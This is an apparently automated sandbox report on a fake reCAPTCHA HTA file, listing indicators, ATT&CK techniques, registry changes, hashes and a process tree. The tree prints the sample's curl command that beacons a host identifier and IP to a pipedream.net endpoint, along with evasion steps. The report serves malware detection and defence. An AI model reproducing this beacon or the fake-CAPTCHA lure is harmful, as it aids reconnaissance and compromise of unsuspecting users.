6367db8e2f02618dd034cd2e78273875756ec9cb20b2e396ce0cacb2e774c54f

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-11-2024 22:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

recaptcha-verify.hta
Size

3KB
MD5

0bcfd0940875c7b01f686ddda93a6fab
SHA1

b9a25db0eb61185546764e3169983a8f1b40bef3
SHA256

6367db8e2f02618dd034cd2e78273875756ec9cb20b2e396ce0cacb2e774c54f
SHA512

078cfc0275c77fcbfe215a6705e21a40e1c7503de4eea93787fc3c2c723f33945378b27fbd2a29335b5416063191add38088d87c5d219112eccaeccccb4d3db8

Score

8^/10

google discovery evasion phishing trojan

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

Processes:

mshta.exe

flow pid process

6 1820 mshta.exe
7 1820 mshta.exe
10 1820 mshta.exe
11 1820 mshta.exe
13 1820 mshta.exe
15 1820 mshta.exe
A potential corporate email address has been identified in the URL: [email protected]
phishing
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe
Detected potential entity reuse from brand GOOGLE.
phishing google
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
6	1820	mshta.exe
7	1820	mshta.exe
10	1820	mshta.exe
11	1820	mshta.exe
13	1820	mshta.exe
15	1820	mshta.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.execmd.exetimeout.exetimeout.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2520 timeout.exe
2528 timeout.exe

pid	process
2520	timeout.exe
2528	timeout.exe

Modifies Internet Explorer settings 1 TTPs 27 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exemshta.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F8536811-9D57-11EF-BA5A-5EE01BAFE073} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

mshta.exeiexplore.exe

pid process

1820 mshta.exe
1608 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid process

1608 iexplore.exe
1608 iexplore.exe
1044 IEXPLORE.EXE
1044 IEXPLORE.EXE
2216 IEXPLORE.EXE
2216 IEXPLORE.EXE

pid	process
1820	mshta.exe
1608	iexplore.exe

pid	process
1608	iexplore.exe
1608	iexplore.exe
1044	IEXPLORE.EXE
1044	IEXPLORE.EXE
2216	IEXPLORE.EXE
2216	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

mshta.exeiexplore.exe

description	pid	process	target process
PID 1820 wrote to memory of 2244	1820	mshta.exe	cmd.exe
PID 1820 wrote to memory of 2244	1820	mshta.exe	cmd.exe
PID 1820 wrote to memory of 2244	1820	mshta.exe	cmd.exe
PID 1820 wrote to memory of 2244	1820	mshta.exe	cmd.exe
PID 1820 wrote to memory of 2520	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2520	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2520	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2520	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2528	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2528	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2528	1820	mshta.exe	timeout.exe
PID 1820 wrote to memory of 2528	1820	mshta.exe	timeout.exe
PID 1608 wrote to memory of 1044	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 1044	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 1044	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 1044	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 2216	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 2216	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 2216	1608	iexplore.exe	IEXPLORE.EXE
PID 1608 wrote to memory of 2216	1608	iexplore.exe	IEXPLORE.EXE

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta"
1⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1820
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl https://b35ce1c36a54234757b98d862f1673a8.m.pipedream.net/XPAJOTIY_10.127.0.221
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2244
- C:\Windows\SysWOW64\timeout.exe
  "C:\Windows\System32\timeout.exe" /T 4 /nobreak
  2⤵
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID:2520
- C:\Windows\SysWOW64\timeout.exe
  "C:\Windows\System32\timeout.exe" /T 1 /nobreak
  2⤵
  - System Location Discovery: System Language Discovery
  - Delays execution with timeout.exe
  PID:2528

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:275457 /prefetch:2
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1044
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:472068 /prefetch:2
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
49c184f9bcfa8d7f049555254aeefdec

SHA1
133d3af6f7783103fa8f5f0fb237b4c730ac7a3c

SHA256
251d652ba33fadf085c8121b4053e7f6878106e2d0be47f5b76e4652697c23f1

SHA512
0737580f225444288989723923376c280d9c901dd14971810b3fa8ab50a5204174b34fa96ff95588851c9a0bf7db83f9b8730cc4e836e08a1963d14c0ba1b57d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_6C4EDE6B4E04AD6FDB8E61232C576EF9

Filesize
471B

MD5
41c2383205d3cd55324f4279de79ba26

SHA1
6ec986a7f44a159d08741275f50e5c2d01c67153

SHA256
015e9b6459510d8235be692b3d0efca022673aefa133dd058d092242b4c5eac1

SHA512
45f211e62a974cb25e18003fe25e0f712d57f467629d90a25b788ce85df488534e3f5bf0f9364a409ab00b86377d3998ddca52c63d1e213b6770e51769fd6731

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
170B

MD5
4a2ee50bf5ce0f41d33d4bc33cdf98c5

SHA1
a07edafbd225dd342cd8ffa4c80ef566d02373b4

SHA256
5b6567c76742027c5418d73a73ef3c7661500e1f1d8c67e8b7cfb9995ed436b1

SHA512
0884887f7cf5f6555f19134fb171f5aa5a3ab3832ecb8080df85b08a9573871b704ad0d137df1eb7847a49a45b4a807e7394d45f9d0c9e3fd394c69e6a06f1f7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
d903703091ab54555ac8ce610dedd75c

SHA1
75546c6f4b547116b77ab54a992dd4640767190f

SHA256
ed684ae903ce31b6372db9ff89ee0ef9f8eb595520ffbf72726787c8add1d67e

SHA512
f14fe21a4122367552e4e2508b13d219560eff94034c62b1e576ff6cb590f4fbf7ecaf940bf91e17a170a60902ffbcf73b4d7afcd9de7c2c2794abcbfea71027

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_6C4EDE6B4E04AD6FDB8E61232C576EF9

Filesize
402B

MD5
d0eabb4984fdd8f25ce24d839f20a056

SHA1
a9c47c5bbd28b6bc98b186830bcb00e09430de0d

SHA256
a39291fccda2e4ec72353e74770d3a137af95eecd36975bbcc131969eaf0a293

SHA512
c047a1a4a9ca10284fe49ca7c498046627796fc7ba8e7a5c1a0136ef457b1f4100462708f2bde9cf12737efa46496a9a478e5a3812cb0084f5813135608b1a66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPUI9R2R\favicon[1].ico

Filesize
5KB

MD5
f3418a443e7d841097c714d69ec4bcb8

SHA1
49263695f6b0cdd72f45cf1b775e660fdc36c606

SHA256
6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

SHA512
82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab47E9.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFE7D1F69C51CCC32A.TMP

Filesize
16KB

MD5
7dcf8fb8c6d1c715eea38d010f6f8110

SHA1
4fc0981e4d2a75828320c7e1a0e343505da54f13

SHA256
24186ed2281ad8372670279fc83951b69bd218cbf51c61ac49a261dad4699a70

SHA512
4f13c9e39874c23bc085583bd45b8a1d69d59324a1a0cb10a40fd2ca83ad74c2a53820ec7a9ea7b02739e02812e2c2883992ca677496ab44058c3662a082be03

Download Submit
memory/1820-46-0x0000000001060000-0x0000000001062000-memory.dmp

Filesize
8KB

Download